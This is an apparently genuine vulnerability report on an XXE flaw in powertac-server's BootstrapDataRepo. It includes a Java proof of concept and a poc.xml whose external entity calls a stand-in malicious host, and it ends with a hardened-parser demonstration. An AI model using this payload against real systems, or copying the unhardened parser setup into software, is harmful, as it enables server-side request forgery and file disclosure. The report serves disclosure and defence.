Description:
An XXE vulnerability may be exploitable when reading Bootstrap data from XML files:
The DocumentBuilderFactory instance used here neither enables secure processing nor disables external entity loading, so XXE becomes possible whenever the URL, or the file behind that URL, is under attacker control, leading to SSRF, information disclosure and so on.
POC:
```java
import org.powertac.common.repo.BootstrapDataRepo;
import java.net.MalformedURLException;
import java.net.URL;

public class PowertacPoC {
    public static void main(String[] args) throws MalformedURLException {
        BootstrapDataRepo bootstrapDataRepo = new BootstrapDataRepo();
        // Point the repo at an attacker-controlled XML file (poc.xml below)
        URL maliciousXMLURL = new URL("file:poc.xml");
        // The unhardened parser resolves the external entity declared in that file
        bootstrapDataRepo.readBootRecord(maliciousXMLURL);
    }
}
```
poc.xml:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://replace.with.malicious.website">]>
<root>&xxe;</root>
```
And I can see the request coming in from the other side (the malicious website).
Recommendation:
```java
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
```
Or
Affected Component:
https://mvnrepository.com/artifact/org.powertac/server-interface <= 1.9.0
https://github.com/powertac/powertac-server <= powertac-server-1.9.0
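The default factory from the report beside a hardened one, as an added example that is not code from the powertac-server project: each factory parses a constructed copy of poc.xml, and an EntityResolver stands in for the network so the program runs offline and simply reports whether the parser attempted to fetch the external entity. The class name, method names and the placeholder SYSTEM URL are my own.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.ByteArrayInputStream;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class XxeHardeningDemo {
    // Constructed input mirroring poc.xml; the SYSTEM URL is a placeholder and is never contacted.
    static final String POC_XML =
          "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<!DOCTYPE root [<!ENTITY xxe SYSTEM \"http://placeholder.invalid/xxe\">]>\n"
        + "<root>&xxe;</root>";
    // Same setup as in the report: JDK defaults, which resolve external entities.
    static DocumentBuilderFactory defaultFactory() {
        return DocumentBuilderFactory.newInstance();
    }
    // Hardened factory: reject any DOCTYPE outright, plus defence in depth if DOCTYPE is ever re-enabled.
    static DocumentBuilderFactory hardenedFactory() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }
    // Parses xml with the given factory and reports whether the parser tried to fetch the
    // external entity. The EntityResolver replaces the network so the demo runs offline.
    static boolean attemptsExternalFetch(DocumentBuilderFactory f, String xml) throws Exception {
        boolean[] fetched = {false};
        DocumentBuilder b = f.newDocumentBuilder();
        b.setEntityResolver((publicId, systemId) -> {
            fetched[0] = true;                             // the SSRF / file read would happen here
            return new InputSource(new StringReader(""));  // hand back empty content instead
        });
        try {
            b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        } catch (SAXParseException e) {
            System.out.println("parser rejected document: " + e.getMessage());
        }
        return fetched[0];
    }
    public static void main(String[] args) throws Exception {
        System.out.println("default factory fetches entity:  " + attemptsExternalFetch(defaultFactory(), POC_XML));
        System.out.println("hardened factory fetches entity: " + attemptsExternalFetch(hardenedFactory(), POC_XML));
    }
}
```

With the JDK's built-in Xerces parser the default factory invokes the resolver (true) while the hardened one rejects the document at the DOCTYPE before any entity is touched (false).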